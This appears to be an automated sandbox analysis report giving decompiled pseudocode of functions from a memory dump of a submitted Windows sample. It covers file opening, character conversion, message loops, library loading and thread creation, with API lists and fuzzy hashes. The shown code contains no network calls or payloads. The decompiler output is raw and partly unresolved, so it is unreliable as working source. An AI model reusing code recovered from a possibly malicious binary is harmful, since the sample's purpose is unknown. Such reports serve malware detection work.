								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E001B980D(_t100);
									goto L36;
								}
								_t61 = E001B9C64(_t86, _t104, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E001B980D(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t89 = _t95 + 8;
							__eflags = _t95 - _t89;
							asm("sbb eax, eax");
							_t65 = _t59 & _t89;
							_t86 = _t95 + 8;
							__eflags = _t65 - 0x400;
							if(_t65 > 0x400) {
								__eflags = _t95 - _t86;
								asm("sbb eax, eax");
								_t100 = E001B7A8A(_t86, _t65 & _t86);
								_pop(_t86);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t86;
							asm("sbb eax, eax");
							E001C0EE0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t69 = _a28;
						if(_t69 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t69;
						if(_t104 > _t69) {
							goto L36;
						}
						_t104 = E001B9C64(0, _t104, _t124, _a8, _a12, _t80, _t99, _a24, _t69, 0, 0, 0);
						if(_t104 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t71 = _t54 & _t94 + 0x00000008;
					_t84 = _t94 + 8;
					if((_t54 & _t94 + 0x00000008) > 0x400) {
						__eflags = _t94 - _t84;
						asm("sbb eax, eax");
						_t80 = E001B7A8A(_t84, _t71 & _t84);
						_pop(_t84);
						__eflags = _t80;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t80 = 0xdddd;
						L12:
						_t80 =  &(_t80[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E001C0EE0();
					_t80 = _t106;
					if(_t80 == 0) {
						goto L36;
					}
					 *_t80 = 0xcccc;
					goto L12;
				}
			}

0x001b95aa
0x001b95ab
0x001b95ac
0x001b95b3
0x001b95b7
0x001b95b8
0x001b95be
0x001b95c4
0x001b95ca
0x001b95cd
0x001b95cd
0x001b95d0
0x001b95d2
0x001b95d2
0x001b95d0
0x001b95d4
0x001b95d9
0x001b95e0
0x001b95e3
0x001b95e3
0x001b95ff
0x001b9605
0x001b960a
0x001b979d
0x001b97b0
0x001b9610
0x001b9610
0x001b9613
0x001b9618
0x001b961c
0x001b9670
0x001b9670
0x001b9672
0x001b9674
0x001b9792
0x001b9792
0x001b9794
0x001b9795
0x001b979b
0x00000000
0x001b979b
0x001b9685
0x001b968b
0x001b968d
0x00000000
0x00000000
0x001b9693
0x001b96a5
0x001b96aa
0x001b96ae
0x00000000
0x00000000
0x001b96bb
0x001b96f5
0x001b96f8
0x001b96fb
0x001b96fd
0x001b96ff
0x001b9701
0x001b974d
0x001b974d
0x001b974f
0x001b974f
0x001b9751
0x001b978b
0x001b978c
0x00000000
0x001b9791
0x001b9765
0x001b976a
0x001b976c
0x00000000
0x00000000
0x001b9770
0x001b9771
0x001b9772
0x001b9775
0x001b97b1
0x001b97b4
0x001b9777
0x001b9777
0x001b9778
0x001b9778
0x001b9785
0x001b9787
0x001b9789
0x001b97ba
0x00000000
0x00000000
0x00000000
0x00000000
0x001b9789
0x001b9703
0x001b9706
0x001b9708
0x001b970a
0x001b970c
0x001b970f
0x001b9714
0x001b972f
0x001b9731
0x001b973b
0x001b973d
0x001b973e
0x001b9740
0x00000000
0x00000000
0x001b9742
0x001b9748
0x001b9748
0x00000000
0x001b9748
0x001b9716
0x001b9718
0x001b971c
0x001b9721
0x001b9723
0x001b9725
0x00000000
0x00000000
0x001b9727
0x00000000
0x001b9727
0x001b96bd
0x001b96c2
0x00000000
0x00000000
0x001b96c8
0x001b96ca
0x00000000
0x00000000
0x001b96e6
0x001b96ea
0x00000000
0x00000000
0x00000000
0x001b96f0
0x001b9623
0x001b9625
0x001b9627
0x001b962f
0x001b964e
0x001b9650
0x001b965a
0x001b965c
0x001b965d
0x001b965f
0x00000000
0x00000000
0x001b9665
0x001b966b
0x001b966b
0x00000000
0x001b966b
0x001b9633
0x001b9637
0x001b963c
0x001b9640
0x00000000
0x00000000
0x001b9646
0x00000000
0x001b9646

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001B451B,001B451B,?,?,?,001B97F6,00000001,00000001,31E85006), ref: 001B95FF
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001B97F6,00000001,00000001,31E85006,?,?,?), ref: 001B9685
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001B977F
__freea.LIBCMT ref: 001B978C

Part of subcall function 001B7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,001B2FA6,?,0000015D,?,?,?,?,001B4482,000000FF,00000000,?,?), ref: 001B7ABC

__freea.LIBCMT ref: 001B9795
__freea.LIBCMT ref: 001B97BA

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 113489a8ca3cdd11b5cfc419c63e3c895213f6294f761747e90e0407e5d63c01
Instruction ID: c23c45108d7f6c6bd657abe7143fdb268d9c52a13ee19b72a5381d5538af66b5
Opcode Fuzzy Hash: 113489a8ca3cdd11b5cfc419c63e3c895213f6294f761747e90e0407e5d63c01
Instruction Fuzzy Hash: 9A519172620216ABDB259F64CC81EEF7BEAEB54750F254629FE05D7140EF34DC42CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00199768, Relevance: 7.6, APIs: 5, Instructions: 116
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00199768(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t48;
				long _t59;
				unsigned int _t61;
				long _t64;
				signed int _t65;
				char _t68;
				void* _t72;
				void* _t74;
				long _t78;
				void* _t81;

				_t74 = __esi;
				E001AD940();
				_t61 = _a4188;
				_t72 = __ecx;
				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
					_t68 = 1;
				} else {
					_t68 = 0;
				}
				_push(_t74);
				asm("sbb esi, esi");
				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t61 & 0x00000001) != 0) {
					_t78 = _t78 | 0x40000000;
				}
				_t64 =  !(_t61 >> 3) & 0x00000001;
				if(_t68 != 0) {
					_t64 = _t64 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
				E00196EF9( &_a12);
				if( *((char*)(_t72 + 0x1c)) != 0) {
					_t78 = _t78 | 0x00000100;
				}
				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
				_t81 = _t48;
				if(_t81 != 0xffffffff) {
					L17:
					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t81, 0,  &_a4, 0);
					}
					 *((char*)(_t72 + 0x12)) = 0;
					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
					 *((intOrPtr*)(_t72 + 0xc)) = 0;
					 *((char*)(_t72 + 0x10)) = 0;
					if(_t81 != 0xffffffff) {
						 *(_t72 + 4) = _t81;
						E0019FAB1(_t72 + 0x1e, _a4184, 0x800);
					}
					return _t65;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E0019B32C(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
						}
						goto L17;
					}
					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
					_t59 = GetLastError();
					if(_t59 == 2) {
						_a4.dwLowDateTime = _t59;
					}
					if(_t81 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}

0x00199768
0x0019976d
0x00199773
0x0019977c
0x0019977e
0x00199789
0x00199794
0x00199790
0x00199790
0x00199790
0x0019979a
0x001997a2
0x001997aa
0x001997b3
0x001997b5
0x001997b5
0x001997c0
0x001997c5
0x001997c7
0x001997c7
0x001997dc
0x001997e0
0x001997e9
0x001997eb
0x001997eb
0x00199804
0x0019980a
0x0019980f
0x00199873
0x00199878
0x0019987f
0x00199888
0x00199893
0x00199893
0x0019989e
0x001998a1
0x001998a4
0x001998a7
0x001998ad
0x001998be
0x001998c2
0x001998c2
0x001998d2
0x00199811
0x00199817
0x00199833
0x00199862
0x00199867
0x00199869
0x00199869
0x00000000
0x00199867
0x0019984c
0x0019984e
0x00199857
0x00199859
0x00199859
0x00199860
0x00000000
0x00000000
0x00000000
0x00000000
0x00199860

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,001976F2,?,00000005,?,00000011), ref: 00199804
GetLastError.KERNEL32(?,?,001976F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00199811
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,001976F2,?,00000005,?), ref: 00199846
GetLastError.KERNEL32(?,?,001976F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0019984E
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001976F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00199893

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 97f64d71f7521e2bbf112ec28858e9d73b508ec07e58829cc902b660abb3b6a9
Instruction ID: 77f8f79f4c537ade51f309b4838524ffaf4321eaa49d2ff2c9911d9c64015147
Opcode Fuzzy Hash: 97f64d71f7521e2bbf112ec28858e9d73b508ec07e58829cc902b660abb3b6a9
Instruction Fuzzy Hash: A241367184474A6BEB209F68DC05BDABBE4FB02324F10071EF9E0961D0D7B5A999CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001AA388, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001AA388() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0x1d75c8; // 0x19004a
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}

0x001aa399
0x001aa3a1
0x001aa3aa
0x001aa3b0
0x001aa3b7
0x001aa3c8
0x001aa3cc
0x001aa3d6
0x00000000
0x001aa3d6
0x001aa3be
0x001aa3c6
0x00000000
0x00000000
0x001aa3c6
0x001aa3e0

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001AA399
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001AA3AA
IsDialogMessageW.USER32(0019004A,?), ref: 001AA3BE
TranslateMessage.USER32(?), ref: 001AA3CC
DispatchMessageW.USER32(?), ref: 001AA3D6

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 87a4ea0adec95007228fac700115d0c25295df5a50d910b1f02d4762dcc5317a
Instruction ID: 530964a953b45ba0890b64561805d63cef01f83ae14465470625b368f67d71f9
Opcode Fuzzy Hash: 87a4ea0adec95007228fac700115d0c25295df5a50d910b1f02d4762dcc5317a
Instruction Fuzzy Hash: 62F0BD71901229AB8B209BF6BC4CDEB7F6CFF062517804529B50AD2450E764D546C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 001A9A32, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001A9A32(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E001A1410( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}

0x001a9a42
0x001a9a49
0x001a9a51
0x001a9a54
0x001a9a61
0x001a9a68
0x001a9a70
0x001a9a76
0x001a9a76
0x001a9a78
0x001a9a7b
0x001a9a80
0x00000000
0x001a9a80
0x001a9a8a

APIs

GetClassNameW.USER32(?,?,00000050), ref: 001A9A49
SHAutoComplete.SHLWAPI(?,00000010), ref: 001A9A80

Part of subcall function 001A1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0019ACFE,?,?,?,0019ACAD,?,-00000002,?,00000000,?), ref: 001A1426

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 001A9A70

Strings

EDIT, xrefs: 001A9A54, 001A9A5F, 001A9A6C

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 0816e3a2623cdbc574dd3d6d8bc370507bb459ceb06a5bf5d3a096717f9ad64c
Instruction ID: da3166d900385786c18051bc76db4a460d312a6151a62c4e37d5ab33a89a8846
Opcode Fuzzy Hash: 0816e3a2623cdbc574dd3d6d8bc370507bb459ceb06a5bf5d3a096717f9ad64c
Instruction Fuzzy Hash: 70F08236A412287BD7309665AC06FEBBB6CAB87B51F44016ABE01E71C0D760D98386F5

Uniqueness

Uniqueness Score: -1.00%

Function 001A9AA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E001A9AA0(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E0019FCFD(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0x1cdffc(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0x1cdeb4( &_v16); // executed
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L001AD820(); // executed
				 *0x1cdf08(0x1d75c0,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}

0x001a9aaf
0x001a9ab6
0x001a9ab9
0x001a9ac2
0x001a9aca
0x001a9ad1
0x001a9adb
0x001a9ae6
0x001a9aea
0x001a9aed
0x001a9af0
0x001a9afa
0x001a9b07

APIs

Part of subcall function 0019FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0019FD18
Part of subcall function 0019FCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0019E7F6,Crypt32.dll,?,0019E878,?,0019E85C,?,?,?,?), ref: 0019FD3A

OleInitialize.OLE32(00000000), ref: 001A9AB9
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001A9AF0
SHGetMalloc.SHELL32(001D75C0), ref: 001A9AFA

Strings

riched20.dll, xrefs: 001A9AA8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: a3b499f24636e2921e98b996ead55d52a59a6bdddb272909ab5a1cefdbd89f27
Instruction ID: f46f8241a2c4d168589792bb3963c100d8be499539a2bf9a4331ee96c0f93f16
Opcode Fuzzy Hash: a3b499f24636e2921e98b996ead55d52a59a6bdddb272909ab5a1cefdbd89f27
Instruction Fuzzy Hash: 0CF0F9B5D0020DABCB10AF99E849EEEFFFCEF94711F00416AE815E2240DBB456458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0019964A, Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0019964A(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00199745(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E0019964A(_t25);
						}
					}
				}
				return _t15;
			}

0x0019964d
0x00199650
0x00199656
0x00199660
0x00199660
0x00199672
0x0019967a
0x001996d6
0x0019967c
0x0019967e
0x00199685
0x0019969e
0x001996a2
0x001996b3
0x001996b7
0x001996d1
0x001996d1
0x001996c3
0x001996c3
0x001996cc
0x00000000
0x001996ce
0x001996ce
0x00000000
0x001996ce
0x001996cc
0x001996a4
0x001996a4
0x001996ad
0x00000000
0x001996af
0x001996af
0x001996af
0x001996ad
0x00199687
0x00199687
0x0019968f
0x00000000
0x00199691
0x00199691
0x00199692
0x00199692
0x00199697
0x00199697
0x0019968f
0x00199685
0x001996de

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0019965A
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00199672
GetLastError.KERNEL32 ref: 001996A4
GetLastError.KERNEL32 ref: 001996C3

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 5de2e6afdff7367b1f07dbc77ec55c9083098d3a63de08d2c1bc8e0c95a5e1a1
Instruction ID: 14b7f90c6dff777ac63cc7d277c2ed7f24777874471aa8219635979e8ff7df14
Opcode Fuzzy Hash: 5de2e6afdff7367b1f07dbc77ec55c9083098d3a63de08d2c1bc8e0c95a5e1a1
Instruction Fuzzy Hash: BB118E30504208EFDF245B68CD44EA97BADEB15321F10C52EF82A85190DB74CD90DF51

Uniqueness

Uniqueness Score: -1.00%

Function 001B9A2C, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E001B9A2C(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x1f0768 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x1c5ba0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x44aa1788
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x001b9a31
0x001b9a35
0x001b9a3c
0x001b9a40
0x001b9a4e
0x001b9a5e
0x001b9a64
0x001b9a68
0x001b9a91
0x001b9a93
0x001b9a97
0x001b9a9a
0x001b9a9a
0x001b9aa0
0x001b9aa2
0x00000000
0x001b9aa3
0x001b9a6a
0x001b9a73
0x001b9a82
0x001b9a75
0x001b9a78
0x001b9a7e
0x001b9a7e
0x001b9a86
0x00000000
0x001b9a88
0x001b9a8b
0x001b9a8d
0x00000000
0x001b9a8d
0x001b9a86
0x001b9a42
0x001b9a47
0x00000000

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,001B2E0F,00000000,00000000,?,001B99D3,001B2E0F,00000000,00000000,00000000,?,001B9BD0,00000006,FlsSetValue), ref: 001B9A5E
GetLastError.KERNEL32(?,001B99D3,001B2E0F,00000000,00000000,00000000,?,001B9BD0,00000006,FlsSetValue,001C6058,001C6060,00000000,00000364,?,001B85E8), ref: 001B9A6A
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001B99D3,001B2E0F,00000000,00000000,00000000,?,001B9BD0,00000006,FlsSetValue,001C6058,001C6060,00000000), ref: 001B9A78

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: e82b10e17d72dd81b2ee866a414cddd1df11a1bce8fc8f379966baf9e9062986
Instruction ID: e2f2ce78d5bffd9f59c88d536e619f932bceda75d3b5cafaaaa011b2cffdc72b
Opcode Fuzzy Hash: e82b10e17d72dd81b2ee866a414cddd1df11a1bce8fc8f379966baf9e9062986
Instruction Fuzzy Hash: C101F236241222ABC7218A789C48EA67F9CBF45BA17210221FA06D7640D730EC42C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 001A04F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E001A04F5() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0x1d00e0 > 0) {
					_t18 = 0x1d00e4;
					do {
						_t7 = CreateThread(0, 0x10000, E001A062F, 0x1d00e0, 0,  &_v4); // executed
						_t22 = _t7;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0x1d00e0);
							E00196CC9(E001AE214(E00196CCE(0x1d00e0)), 0x1d00e0, 0x1d00e0, 2);
						}
						 *_t18 = _t22;
						 *0x001D01E4 =  *((intOrPtr*)(0x1d01e4)) + 1;
						_t8 =  *0x1d7368; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0x1d00e0);
					return _t8;
				}
				return _t5;
			}

0x001a04fa
0x001a04fe
0x001a0502
0x001a0505
0x001a0519
0x001a051f
0x001a0523
0x001a0525
0x001a052a
0x001a0547
0x001a0547
0x001a054c
0x001a054e
0x001a0554
0x001a055b
0x001a0560
0x001a0560
0x001a0566
0x001a0567
0x001a056a
0x00000000
0x001a056f
0x001a0573

APIs

CreateThread.KERNELBASE ref: 001A0519
SetThreadPriority.KERNEL32(?,00000000), ref: 001A0560

Part of subcall function 00196CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00196CEC

Strings

CreateThread failed, xrefs: 001A0525

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 68e303e3b2c01b6edebc1c4b46db45e83c7c314668177f2bfff338769194f657
Instruction ID: 82352e2501393adec09a527a831bae96831c444ba5e434d1c0a83ea3d2824f57
Opcode Fuzzy Hash: 68e303e3b2c01b6edebc1c4b46db45e83c7c314668177f2bfff338769194f657
Instruction Fuzzy Hash: 5401F9B57443057FD7256F509C41F6A77A8EB5E751F10042FF685622C1CBB1AC84CA30

Uniqueness

Uniqueness Score: -1.00%

Function 00199C34, Relevance: 4.6, APIs: 3, Instructions: 96
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00199C34(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
				void* __ebp;
				int _t24;
				long _t32;
				void* _t36;
				void* _t42;
				void* _t52;
				intOrPtr* _t53;
				void* _t57;
				intOrPtr _t58;
				long _t59;

				_t52 = __edx;
				_t59 = _a8;
